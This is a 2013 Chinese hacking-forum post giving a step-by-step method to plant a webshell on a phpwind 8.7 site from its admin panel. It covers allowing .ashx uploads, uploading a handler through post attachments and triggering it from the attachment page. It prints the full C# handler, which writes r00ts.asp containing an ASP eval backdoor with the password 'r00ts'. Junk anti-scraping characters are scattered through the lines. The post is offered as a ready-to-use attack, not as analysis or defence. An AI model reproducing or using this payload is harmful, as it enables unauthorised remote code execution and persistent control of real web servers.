找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2626|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
* F# \) O# O- O1 B' x
) @7 I; |1 N$ |- {# d7 X- B群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
6 u- F" n8 j- N, ~* H% f( P4 s$ `
- M2 \3 M6 q1 h) h* I  C1 S8 Q6 T发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整, F8 q; @. w8 @! l1 D

3 g! r2 w6 R0 G0 t; U" I6 {然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx2 O3 ~5 _& b/ ~
6 w/ @: [+ `0 `3 p2 R
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
, D% V* w6 |/ B# w' V7 M7 b3 u1 Y " A" l- A+ W6 T1 z
下面是代码:
4 D* E; s5 z; t - s& X% S* \, b: r
<%@ WebHandler Language="C#"Class="Handler" %>+ g% Y- Z, u. O- O# ~. b
using System;' K9 ?# s" F" D
using System.Web;7 Q5 V1 A& e5 j/ e  J, o( N
using System.IO;1 x6 P+ k9 w  c- f
public class Handler : IHttpHandler {
: A! `/ @, ^  I( F/ @5 i7 y( Npublic void ProcessRequest (HttpContext context) {
& g& H/ p+ K. e7 D+ R3 z4 a6 jcontext.Response.ContentType = "text/plain";
* P; f$ z+ m, Y4 g2 eStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));8 K9 x/ g! J, w' }+ w# a, `
file1.Write("<%eval request(\"r00ts\")%>");
5 H, S+ S/ P) M! _! X+ cfile1.Flush();; T% X1 @. K" Z$ u
file1.Close();
* X/ u; W  g+ }' @/ E. z& s% G}
$ x7 {# g$ p) o6 ]public bool IsReusable {* Q  l" J' O  U, Q! g3 `
get {
+ D4 t( t( l) areturn false;3 N; s7 P8 w% c9 l2 i
}& v: |0 ~0 {% L& ~; Y! i
}$ h; n& Y& X) \  P& D/ w; H  n; N
}+ U, Y" p3 q( s1 Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表